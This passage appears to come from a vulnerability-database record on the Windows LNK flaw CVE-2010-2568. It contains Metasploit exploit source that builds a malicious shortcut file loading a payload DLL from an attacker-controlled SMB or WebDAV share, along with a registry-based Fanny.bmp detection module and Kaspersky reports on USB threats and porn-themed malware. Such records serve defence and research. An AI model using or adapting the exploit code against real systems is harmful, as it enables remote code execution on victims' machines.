idlist_data << [0x12 + 2].pack('v')\n idlist_data << [\n 0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,\n 0x30, 0x9d\n ].pack('C*')\n idlist_data << [0x12 + 2].pack('v')\n idlist_data << [\n 0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,\n 0x30, 0x9d\n ].pack('C*')\n idlist_data << [path.length + 2].pack('v')\n idlist_data << path\n idlist_data << [0x00].pack('v') # TERMINAL WOO\n\n # LinkTargetIDList\n ret << [idlist_data.length].pack('v') # IDListSize\n ret << idlist_data\n\n # ExtraData blocks (none)\n ret << [rand(4)].pack('V')\n\n # Patch in the LinkFlags\n ret[0x14, 4] = [\"10000001000000000000000000000000\".to_i(2)].pack('N')\n ret\n end\n\n def exploit\n\n unc = \"\\\\\\\\\"\n if (datastore['UNCHOST'])\n unc << datastore['UNCHOST'].dup\n else\n unc << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])\n end\n unc << \"\\\\\"\n unc << rand_text_alpha(rand(8)+4)\n unc << \"\\\\\"\n\n @exploit_unc = unc\n @exploit_lnk = rand_text_alpha(rand(8)+4) + \".lnk\"\n @exploit_dll = rand_text_alpha(rand(8)+4) + \".dll\"\n\n if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'\n fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')\n end\n\n print_status(\"Send vulnerable clients to #{@exploit_unc}.\")\n print_status(\"Or, get clients to save and render the icon of http://<your host>/<anything>.lnk\")\n\n super\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ms10_046_shortcut_icon_dllloader.rb"}, {"lastseen": "2021-03-22T08:10:57", "description": "This module searches for the Fanny.bmp worm related reg keys. fannybmp is a worm that exploited zero day vulns (more specifically, the LNK Exploit CVE-2010-2568). 
Which allowed it to spread even if USB Autorun was turned off. This is the same exploit that was used in StuxNet.\n", "published": "2021-01-25T19:54:37", "type": "metasploit", "title": "FannyBMP or DementiaWheel Detection Registry Check", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568"], "modified": "2021-01-25T19:54:44", "id": "MSF:POST/WINDOWS/GATHER/FORENSICS/FANNY_BMP_CHECK/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Common\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'FannyBMP or DementiaWheel Detection Registry Check',\n 'Description' => %q{\n This module searches for the Fanny.bmp worm related reg keys.\n fannybmp is a worm that exploited zero day vulns\n (more specifically, the LNK Exploit CVE-2010-2568).\n Which allowed it to spread even if USB Autorun was turned off.\n This is the same exploit that was used in StuxNet.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['William M.'],\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter', 'shell'],\n 'References' =>\n [\n ['URL', 'https://securelist.com/a-fanny-equation-i-am-your-father-stuxnet/68787'],\n ['CVE', '2010-2568']\n ]\n )\n )\n end\n\n def run\n artifacts =\n [\n 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\\"acm\"',\n 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\acm\\ECELP4',\n 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\acm\\ECELP4\\Driver',\n 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\acm\\ECELP4\\filter2',\n 'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\acm\\ECELP4\\filter3',\n 
'HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\acm\\ECELP4\\filter8'\n ]\n\n matches = {}\n print_status('Searching the registry for Fanny.bmp artifacts.')\n artifacts.each do |key|\n key, _, value = key.rpartition('\\\\')\n has_key = registry_enumkeys(key)\n has_val = registry_enumvals(key)\n next unless has_key&.include?(value) || has_val&.include?(value)\n\n print_good(\"Target #{key}\\\\#{value} found in registry.\")\n matches[key] = value\n end\n\n unless matches.empty?\n report_vuln(\n host: session.session_host,\n name: name,\n info: \"Target keys found in registry:\\n#{matches.map { |k, v| \"#{k}: #{v}\\n\" }.join}\",\n refs: references,\n exploited_at: Time.now.utc\n )\n end\n print_status('Done.')\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/forensics/fanny_bmp_check.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-19T01:01:38", "description": "This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. 
This creates an SMB resource to provide the payload inside a DLL, and generates a LNK file which must be sent to the target.\n", "published": "2015-03-12T04:23:56", "type": "metasploit", "title": "Microsoft Windows Shell LNK Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2568"], "modified": "2019-05-23T12:01:21", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS10_046_SHORTCUT_ICON_DLLLOADER", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::SMB::Server::Share\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t\t=> 'Microsoft Windows Shell LNK Code Execution',\n 'Description'\t=> %q{\n This module exploits a vulnerability in the handling of Windows\n Shortcut files (.LNK) that contain an icon resource pointing to a\n malicious DLL. 
This creates an SMB resource to provide the payload\n inside a DLL, and generates a LNK file which must be sent to the\n target.\n },\n 'Author'\t\t=>\n [\n 'hdm', # Module itself\n 'jduck', # WebDAV implementation, UNCHOST var\n 'B_H' # Clean LNK template\n ],\n 'License'\t\t=> MSF_LICENSE,\n 'References'\t=>\n [\n ['CVE', '2010-2568'],\n ['OSVDB', '66387'],\n ['MSB', 'MS10-046'],\n ['URL', 'https://github.com/rapid7/metasploit-framework/pull/4911'] # How to guide here\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload'\t\t=>\n {\n 'Space'\t=> 2048,\n },\n 'Platform'\t\t=> 'win',\n 'Targets'\t\t=>\n [\n [ 'Automatic',\t{ } ]\n ],\n 'DisclosureDate' => 'Jul 16 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [true, 'The LNK file', 'msf.lnk'])\n ])\n\n register_advanced_options(\n [\n OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', false])\n ])\n\n deregister_options('FILE_CONTENTS', 'FILE_NAME')\n end\n\n def setup\n super\n\n self.file_contents = generate_payload_dll\n self.file_name = \"#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll\"\n print_status(\"File available on #{unc}...\")\n end\n\n def primer\n lnk = generate_link(unc)\n file_create(lnk)\n print_status('The LNK file must be sent or shared with the target...')\n end\n\n def generate_link(unc)\n uni_unc = unc.unpack('C*').pack('v*')\n path = ''\n path << [\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00\n ].pack('C*')\n path << uni_unc\n\n # LinkHeader\n ret = [\n 0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x46, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00\n ].pack('C*')\n\n idlist_data = ''\n idlist_data << [0x12 + 2].pack('v')\n idlist_data << [\n 0x1f, 0x00, 0xe0, 0x4f, 0xd0, 0x20, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xd8, 0x08, 0x00, 0x2b, 0x30,\n 0x30, 0x9d\n ].pack('C*')\n idlist_data << [0x12 + 2].pack('v')\n idlist_data << [\n 0x2e, 0x1e, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30,\n 0x30, 0x9d\n ].pack('C*')\n idlist_data << [path.length + 2].pack('v')\n idlist_data << path\n idlist_data << [0x00].pack('v') # TERMINAL WOO\n\n # LinkTargetIDList\n ret << [idlist_data.length].pack('v') # IDListSize\n ret << idlist_data\n\n # ExtraData blocks (none)\n ret << [rand(4)].pack('V')\n\n # Patch in the LinkFlags\n ret[0x14, 4] = ['10000001000000000000000000000000'.to_i(2)].pack('N')\n ret\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms10_046_shortcut_icon_dllloader.rb"}], "securelist": [{"lastseen": "2018-09-25T10:09:11", "bulletinFamily": "blog", "cvelist": ["CVE-2010-2568"], "description": "\n\n## Introduction\n\nIn 2016, [researchers](<https://elie.net/publication/users-really-do-plug-in-usb-drives-they-find>) from the University of Illinois left 297 unlabelled USB flash drives around the university campus to see what would happen. 98% of the dropped drives were picked up by staff and students, and at least half were plugged into a computer in order to view the content. For a hacker trying to infect a computer network, those are pretty irresistible odds.\n\nUSB devices have been around for almost 20 years, offering an easy and convenient way to store and transfer digital files between computers that are not directly connected to each other or to the internet. 
This capability has been exploited by cyberthreat actors, most famously by the [Stuxnet](<https://securelist.com/the-echo-of-stuxnet-surprising-findings-in-the-windows-exploits-landscape/65367/>) worm in 2010, which used USB devices to inject malware into the network of an Iranian nuclear facility.\n\nToday, cloud services such as Dropbox have taken on much of the heavy lifting in terms of file storage and transfer, and there is greater awareness of the security risks associated with USB devices. Their use as an essential business tool is declining. Despite this, millions of USB devices are still produced and distributed annually, with many destined for use in homes, businesses and marketing promotion campaigns like trade show giveaways.\n\nUSB devices remain a target for cyberthreats. Kaspersky Lab data for 2017 shows that every 12 months or so, around one in four users worldwide is affected by a 'local' cyber incident. These are attacks detected directly on a user's computer and include infections caused by removable media like USB devices.\n\nThis short report reviews the current cyberthreat landscape for removable media, particularly USBs, and provides advice and recommendations on protecting these little devices and the data they carry.\n\n## Methodology and key findings\n\nThe overview is based on detections by Kaspersky Lab's file protection technologies in the drive root of user computers, with a specific scan filter and other measures applied. It covers malware-class attacks only and does not include detections of potentially dangerous or unwanted programs such as adware or [risk tools](<https://encyclopedia.kaspersky.com/knowledge/risktool/>) (programs that are not inherently malicious, but are used to hide files or terminate applications, etc. that could be used with malicious intent). 
The detection data is shared voluntarily by users via Kaspersky Security Network (KSN).\n\n### Key findings\n\n * USB devices and other removable media are being used to spread cryptocurrency mining software \u2013 and have been since at least 2015. Some victims were found to have been carrying the infection for years.\n * The rate of detection for the most popular bitcoin miner, Trojan.Win64.Miner.all, is growing by around one-sixth year-on-year.\n * One in 10 of all users hit by removable media infections in 2018 was targeted with this crypto-miner (around 9.22%, up from 6.7% in 2017 and 4.2% in 2016).\n * Other malware spread through removable media/USBs includes the Windows LNK family of Trojans, which has been among the top three USB threats detected since at least 2016.\n * The 2010 Stuxnet exploit, CVE-2010-2568, remains one of the top 10 malicious exploits spread via removable media.\n * Emerging markets are the most vulnerable to malicious infection spread by removable media \u2013 with Asia, Africa and South America among the most affected \u2013 but isolated hits were also detected in countries in Europe and North America.\n * Dark Tequila, a complex banking malware reported on August 21, 2018 has been claiming consumer and corporate victims in Mexico since at least 2013, with the infection spreading mainly through USB devices.\n\n## The evolving cyberthreat landscape for USBs\n\nInfections caused by removable media are defined as local threats \u2013 those that are detected directly on a user's computer, for example, during a scheduled, installation or user-initiated security scan. Local threats differ from threats targeting computers over the internet (web-borne threats), which are far more prevalent. Local infections can also be caused by an encrypted malicious program hidden in a complex installer. 
To isolate the data for malware spread by removable media such as USB devices, we took the detections triggered in the drive root of affected computers \u2013 a strong indicator that the infection source is removable media.\n\nThis data shows that the number of removable media (drive root) threat detections has declined steadily since 2014, but the overall rate of decline may be slowing down. In 2014, the ratio between a user affected by a removable media threat and the total number of such threats detected was 1:42; by 2017 this had dropped by around half to 1:25; with the estimate for 2018 around 1:22.\n\nThese numbers pale in comparison to web-borne threats: in 2017, Kaspersky Lab's file antivirus detected 113.8 million likely removable media threats, while its web antivirus repelled just under 1.2 billion attacks launched from online resources. In light of this, it can be easy to overlook the enduring risks presented by removable media, even though around four million users worldwide will be infected in this way in 2018.\n\n_*Total number (in millions) of malware detections triggered in the drive root of user computers, a strong indicator of infection by removable media, 2013 \u2013 2018. Source: KSN_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/25093420/180924-usb-threats-from-malware-to-miners-1.png>)\n\n_*Number of unique users (in millions) with malware detections triggered in the drive root of computers, a strong indicator of infection by removable media, 2013 \u2013 2018. Source: KSN_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/25093424/180924-usb-threats-from-malware-to-miners-2.png>)\n\n### USBs as a tool for advanced threat actors\n\nUSB devices appeal to attackers targeting computer networks that are not connected to the internet \u2013 such as those powering critical national infrastructure. 
The most famous example of this is probably the [Stuxnet](<https://securelist.com/the-echo-of-stuxnet-surprising-findings-in-the-windows-exploits-landscape/65367/>) campaign. In 2009 and 2010, the Stuxnet worm targeted Iran's nuclear facilities in order to disrupt operations.\n\nUSB devices were used to inject malware into the facilities' air-gapped networks. Among other things, the devices included an exploit to a Windows LNK vulnerability (CVE-2010-2568) that enabled remote code execution. Other advanced threat actors, including [Equation Group](<https://securelist.com/equation-group-from-houston-with-love/68877/>), [Flame](<https://securelist.com/the-flame-questions-and-answers-51/34344/>), [Regin](<https://securelist.com/regin-nation-state-ownage-of-gsm-networks/67741/>) and [HackingTeam](<https://securelist.com/spyware-hackingteam/37064/>), have all integrated exploits for this vulnerability into removable media to use in attacks.\n\nFurther, the structure of most USB devices allows them to be converted to provide hidden storage compartments, for the removal of stolen data, for example. The [ProjectSauron](<https://securelist.com/faq-the-projectsauron-apt/75533/>) 2016 toolkit was found to include a special module designed to move data from air-gapped networks to internet-connected systems. This involved USB drives that had been formatted to change the size of the partition on the USB disk, reserving some hidden space (several hundred megabytes) at the end of the disk for malicious purposes.\n\n### The Stuxnet survivor CVE-2010-2568\n\nMicrosoft fixed the last of the vulnerable LNK code path in March 2015. 
However, in 2016, as many as [one in four](<https://securelist.com/exploits-how-great-is-the-threat/78125/>) Kaspersky Lab users who encountered an exploit through any attack medium, including web-borne threats, faced an exploit for this [vulnerability](<https://securelist.com/the-echo-of-stuxnet-surprising-findings-in-the-windows-exploits-landscape/65367/>), (although it was overtaken in 2017 by the [EternalBlue](<https://www.wired.co.uk/article/what-is-eternal-blue-exploit-vulnerability-patch>) exploit). However, CVE-2010-2568 continues to feature in malware distributed by USB devices and other removable media: where, despite rapidly falling numbers of detections and victims, it still ranks among the top 10 drive root threats detected by KSN.\n\n_Total drive root (removable media) detections (in millions) of an exploit for CVE-2010-2568, 2013 \u2013 2018. Source: KSN_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/25093429/180924-usb-threats-from-malware-to-miners-3.png>)\n\n_Users with drive root (removable media) detections (in millions) of an exploit for CVE-2010-2568, 2013 \u2013 2018. Source: KSN_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/25093434/180924-usb-threats-from-malware-to-miners-4.png>)\n\nIf the exploit detections provide an indication of the volume of malware being transmitted via removable media such as USBs, the following illustrate the kind of malware being distributed in this way.\n\n### Malware delivered via removable media\n\nThe top malware spread via removable media has stayed relatively consistent since at least 2016. For example, the family of [Windows LNK](<https://threats.kaspersky.com/en/threat/Trojan.WinLNK.Agent/>) malware, Trojans containing links for downloading malicious files or paths for launching a malicious executable, has remained among the top three threats spread by removable media. 
This malware is used by attackers to destroy, block, modify or copy data, or to disrupt the operation of a device or its network. The [WinLNK Runner Trojan](<https://threats.kaspersky.com/en/threat/Trojan.WinLNK.Runner/>), which was the top detected USB threat in 2017, is used in worms for launching executable files.\n\nIn 2017, 22.7 million attempted WinLNK.Agent infections were detected, affecting nearly 900,000 users. The estimate for 2018 is around 23 million attacks, hitting just over 700,000 users. This represents a 2% rise in detections and a 20% drop in the number of users targeted year-on-year.\n\nFor the WinLNK Runner Trojan the numbers are expected to fall more sharply \u2013 with a 61% drop in detections from 2.75 million in 2017 to an estimated 1 million in 2018; and a decline of 51% in the number of users targeted (from around 920,000 in 2017 to just over 450,000 in 2018).\n\nOther top malware spread through USB devices includes the [Sality](<https://threats.kaspersky.com/en/threat/Virus.Win32.Sality/>) virus, first detected in 2003 but heavily modified since; and the [Dinihou](<https://threats.kaspersky.com/en/threat/Worm.VBS.Dinihou/>) worm that automatically copies itself onto a USB drive, creating malicious shortcuts (LNKs) that launch the worm as soon as the new victim opens them.\n\n### Miners \u2013 rare but persistent\n\nUSB devices are also being used to spread cryptocurrency mining software. This is relatively uncommon, but successful enough for attackers to continue using this method of distribution. According to KSN data, a popular crypto-miner detected in drive roots is Trojan.Win32.Miner.ays/Trojan.Win64.Miner.all, known since 2014.\n\nMalware in this family secretly uses the processor capacity of the infected computer to generate the cryptocurrency. 
The Trojan drops the mining application onto the PC, then installs and silently launches the mining software and downloads the parameters that enable it to send the results to an external server controlled by the attacker.\n\nKaspersky Lab's data shows that some of the infections detected in 2018 date back years, indicating a lengthy infection likely to have had a significant negative impact on the processing power of the victim device.\n\nDetection data for the 32-bit version of Trojan.Win32.Miner.ays is as follows:\n\n**Year** | **Detection data for Trojan.Win32.Miner.ays** | **Unique user count** \n---|---|--- \n2017 | 778,620 | 236,000 \n2018 (estimate based on H1) | 600,698 | 196,866 \n \nBetween H1 2017 (136,954 unique users) and H1 2018 (93,433 unique users), there was a fall of 28.13 percentage points in the number of people affected by the 32-bit version of the miner.\n\nThe other version, Trojan.Win64.Miner.all, saw an expected surge in the first year of detection, after which the number of users hit has levelled out to a steady growth rate of around one-sixth per year. This small but steady growth rate can also be seen when the number of users targeted with this mining malware is compared against the overall number of users hit by removable media threats. 
This shows that around one in 10 users hit with a removable media threat in 2018 will be targeted with this miner, about a two-fold rise in two years.\n\nThese results suggest that propagation via removable media works well for this threat.\n\nDetection data for Trojan.Win64.Miner.all is as follows:\n\n**Year** | **Detection data for** \n**Trojan.Win64.Miner.all ** | **Unique user count** | **YoY change** | **Unique user count as share of all users hit with a removable media threat** \n---|---|---|---|--- \n2016 | 4,211,246 | 245,702 | +70.15% | 4.2% \n2017 | 4,214,785 | 301,178 | +18.42% | 6.7% \n2018 (estimate based on H1) | 4,209,958 | 362,242 | +16.42% | 9.2% \n \n### Dark Tequila \u2013 advanced banking malware\n\nIn August 2018, Kaspersky Lab researchers reported on a sophisticated cyber operation code-named [Dark Tequila](<https://securelist.com/dark-tequila-anejo/87528/>) that has been targeting users in Mexico for at least the last five years, stealing bank credentials and personal and corporate data with malware that can move laterally through the victim computer while offline.\n\nAccording to Kaspersky Lab researchers, the malicious code spreads through infected USB devices and spear phishing and includes features to evade detection. The threat actor behind Dark Tequila is believed to be Spanish-speaking and Latin American in origin.\n\n## Target geography\n\nEmerging markets appear to be the most vulnerable to infection by removable media.\n\nThe annual numbers for 2017 show that in many such countries, around two-thirds of users experienced a 'local' incident, which includes drive root malware infections from removable media, compared to less than one in four in developed economies. 
These figures appear to be remaining consistent into 2018.\n\nFor the LNK exploit spread through removable media, the most affected countries in 2018 to date are Vietnam (18.8% of users affected), Algeria (11.2%) and India (10.9%), with infections also found in the rest of Asia, Russia and Brazil, among others, and a few hits in a number of European countries (Spain, Germany, France, the UK and Italy), the U.S. and Japan.\n\n_Share of users affected by an exploit for CVE-2010-2568 through removable media, 2018. Source: KSN (only countries with more than 10,000 Kaspersky Lab customers are included)_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/25093438/180924-usb-threats-from-malware-to-miners-5.png>)\n\nThe reach is broader for the miner. Trojan.Win32.Miner.ays/Trojan.Win64.Miner.all detections are mainly found in India (23.7%), Russia (18.45% \u2013 likely to be impacted by a larger customer base) and Kazakhstan (14.38%), with infections also found in other parts of Asia and Africa, and a few hits in several European countries (the UK, Germany, the Netherlands, Switzerland, Spain, Belgium, Austria, Italy, Denmark and Sweden), the U.S., Canada and Japan.\n\n_Share of users affected by the bitcoin cryptocurrency miner through removable media, 2018. 
Source: KSN (only countries with more than 10,000 Kaspersky Lab customers are included)_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/09/25093415/180924-usb-threats-from-malware-to-miners-6.png>)\n\n## Conclusion and advice\n\nThe main purpose of this short paper is to raise awareness of a threat that consumers and businesses may underestimate.\n\nUSB drives offer many advantages: they are compact and handy, and a great brand asset, but the devices themselves, the data stored on them and the computers they are plugged into are all potentially vulnerable to cyberthreats if left unprotected.\n\nFortunately, there are some effective steps consumers and organizations can take to secure the use of USB devices.\n\nAdvice for all USB users:\n\n * Be careful about the devices you connect to your computer \u2013 do you know where it came from?\n * Invest in encrypted USB devices from trusted brands \u2013 this way you know your data is safe even if you lose the device\n * Make sure all data stored on the USB is also encrypted\n * Have a security solution in place that checks all removable media for malware before they are connected to the network \u2013 even trusted brands can be compromised through their supply chain\n\nAdditional advice for businesses:\n\n * Manage the use of USB devices: define which USB devices can be used, by whom and for what\n * Educate employees on safe USB practices \u2013 particularly if they are moving the device between a home computer and a work device\n * Don't leave USBs lying around or on display\n\nKaspersky Lab's security solutions, such as [Kaspersky Endpoint Security for Windows,](<https://www.kaspersky.co.uk/small-to-medium-business-security/endpoint-windows>) provide security and encryption for all removable media including USB devices.", "modified": "2018-09-25T10:00:57", "published": "2018-09-25T10:00:57", "id": "SECURELIST:048C7F20536D86F920F5CE9B67D02D6B", "href": 
"https://securelist.com/usb-threats-from-malware-to-miners/87989/", "type": "securelist", "title": "USB threats from malware to miners", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-03-13T12:52:04", "bulletinFamily": "blog", "cvelist": ["CVE-2010-2568", "CVE-2017-8464"], "description": "\n\n[ **More graphs and statistics in full PDF version**](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/13112943/Threats_to_users_of_adult_websites_2018.pdf>)\n\n## Introduction\n\n2018 was a year that saw campaigns to decrease online pornographic content and traffic. For example, one of the most adult-content friendly platforms \u2013 Tumblr \u2013 announced it was [banning erotic content ](<https://www.theverge.com/2018/12/5/18126451/tumblr-porn-social-media-ban>) (even though [almost a quarter](<https://motherboard.vice.com/en_us/article/4xa8v3/so-how-much-porn-is-on-tumblr>) of its users consume adult content). In addition, the UK received the title of '[The Second Most Porn-Hungry Country in the World](<http://www.gizmodo.co.uk/2018/12/the-uk-is-still-the-second-most-porn-hungry-country-in-the-world-according-to-pornhub/>)' and is now [implementing a law on age-verification for pornography lovers](<https://uk.news.yahoo.com/porn-sites-will-require-proof-age-april-next-year-123901041.html>) that will prohibit anyone below the age of 18 to watch this sort of content. This is potentially[ opening a world of new tricks](<https://news.sky.com/story/academics-doubt-value-of-online-porn-age-checks-10952614https:/news.sky.com/story/academics-doubt-value-of-online-porn-age-checks-10952614>) for scammers and threat actors to take advantage of users. 
In addition, even commercial giant Starbucks [declared a 'holy war' on porn](<https://www.nbcnews.com/news/us-news/starbucks-says-it-will-start-blocking-pornography-its-stores-wi-n941646>) as it was revealed that many visitors prefer to have their coffee while consuming adult content, rather than listening to music or reading the latest headlines on news websites.\n\nSuch measures might well be valid, at least from a cybersecurity perspective, as the following example suggests. According to news reports last year, an extremely active [adult website user](<https://www.oversight.gov/sites/default/files/oig-reports/ManagementAdvisory%20_USGSITSecurityVulnerabilities_101718_0.pdf>), who turned out to be a government employee, dramatically failed to keep his hobby outside of the workplace. By accessing more than 9,000 web pages with adult content, he compromised his device and subsequently infected the entire network with malware, leaving it vulnerable to spyware attacks. This, and other examples confirm that adult content remains a controversial topic from both a social and cybersecurity standpoint.\n\nIt is no secret that digital pornography has long been associated with malware and cyberthreats. While [some](<https://www.kaspersky.com/blog/porno-danger-fact-or-fiction/21865/>) of these stories are now shown to be myths, others are very legitimate. A year ago, we conducted [research](<https://www.kaspersky.com/blog/porn-themed-threats-report/20891/>) on the malware hidden in pornography and found out that such threats are both real and effective. 
One of the key takeaways of last year's report was the fact that cybercriminals not only use adult content in multiple ways \u2013 from lucrative decoys to make victims install malicious applications on their devices, to topical fraud schemes used to steal victims' banking credentials and other personal information \u2013 but they also make money by stealing access to pornographic websites and reselling it at a cheaper price than the cost of a direct subscription.\n\nLast year, we discovered a number of malicious samples that were specifically hunting for credentials to access some of the most popular pornographic websites. When we considered why someone would hunt for credentials to pornographic websites, we checked the underground markets (both on the dark web and on open parts of the internet) and found that credentials to pornography website accounts are themselves quite a valuable commodity to be sold online. They are for sale in their thousands.\n\nIt would be going too far to say that the findings from our previous exploration of the relationships between cyberthreats and adult content were unexpected. At the end of the day, pornography has always been, and remains one of the most sought after types of online content. At the same time, cybercriminals have always looked to increase their profits with the most efficient and cheapest way of delivering malicious payloads to victims. It was almost inevitable that adult content would become an important tool for them.\n\nThat said, our monitoring of the wider cyberthreat landscape shows that threat actors tend to change their habits, tactics and techniques over time. This means that even in a niche area, such as pornographic content and websites, changes are possible. That is why this year we decided to repeat our exercise and investigate the topic once again. 
As it turned out, some things have indeed changed.\n\n## Methodology and key findings\n\nTo measure the level of risk that may be associated with adult content online, we investigated several different indicators. We examined malware disguised as pornographic content, and malware that hunts for credentials to access pornography websites. We looked at the threats that are attacking users across the internet in order to find out which popular websites might be dangerous to visit. Additionally, we checked our phishing and spam database to see if there is a lot of pornographic content on file and how it is used in the wild. Using aggregated threat-statistics obtained from the Kaspersky Security Network \u2013 the infrastructure dedicated to processing cybersecurity-related data streams from millions of voluntary participants around the world \u2013 we measured how often and how many users of our products have encountered adult-content themed threats.\n\nAdditionally, we checked around twenty underground online markets and counted how many accounts are up for sale, which are the most popular, and the price they are sold for.\n\nAs a result, we discovered the following:\n\n * **Searching for pornography online has become safer:** in 2018, there were **650,000 attacks** launched from online resources. That is **36% less** than in 2017 when more than a million of these attacks were detected.\n * **Cybercriminals are actively using popular porn-tags to promote malware in search results.** The 20 most popular make up 80% of all malware disguised as porn. Overall, 87,227 unique users downloaded porn-disguised malware in 2018, with 8% of them using a corporate rather than personal network to do this.\n * **In 2018, the number of attacks using malware to hunt for credentials that grant access to pornography websites grew almost three-fold compared to 2017,** with more than 850,000 attempts to install such malware. 
The number of users attacked doubled, with 110,000 attacked PCs across the world.\n * The number of **unique sales offers of credentials for premium accounts to adult content websites almost doubled** to more than **10,000**.\n * **Porn-themed threats increased in terms of the number of samples, but declined in terms of variety:** In 2018, Kaspersky Lab identified at least **642 families of PC threats** disguised under one common pornography tag. In terms of their malicious function, these families were distributed between **57 types** (76 last year). In most cases they are **Trojan-Downloaders, Trojans and AdWare.**\n * **89%** of infected files disguised as pornography on Android devices turned out to be **AdWare**.\n * In Q4 2018, there were 10 times as many attacks coming from phishing websites pretending to be popular adult content resources, compared to Q4 2017 when the overall figure reached **21,902 attacks**.\n\n## Part 1 - Malware\n\nAs mentioned above, cybercriminals put a lot of effort into delivering malware to user devices, and pornography serves as a great vehicle for this. Most malware that reaches users' computers from malicious websites is usually disguised as videos. Users who do not check the file extension and go on to download and open it, are sent to a webpage that extorts money. This is achieved by playing the video online or for free only after the user agrees to install a malicious file disguised as a software update or something similar. However, in order to download anything from this kind of website, the user first has to find the website. That is why the most common first-stage infection scenarios for both PC and mobile porn-disguised malware involve the manipulation of search query results.\n\nTo do this, cybercriminals first identify which search requests are the most popular among users looking for pornography. They then implement so-called 'black SEO' techniques. 
This involves changing the malicious website content and description so that it appears higher up on the search results pages. Such websites can be found in third or fourth place in the list of search results.\n\nAccording to our findings, this method is still actively used but its efficiency is falling. To check this, we took 100 of the top listed pornographic websites (as suggested by search engines after entering a query for the word 'porn'), plus those that have the word 'porn' in the title, and checked whether any of them pose a threat to users. It turned out that in 2017 our products stopped more than a million users from attempting to install malware from websites on the list. However, in 2018, the number of users affected decreased to 658,930. This could be the result of search engines putting processes in place to fight 'black SEO' activities and protect users from malicious content.\n\n### Porn tags = Malware tags\n\nOptimizing malicious websites so that those wanting to view adult content will find them is not the only technique criminals use to deliver infected files to victims' devices. During our research it turned out that cybercriminals are disguising malware or 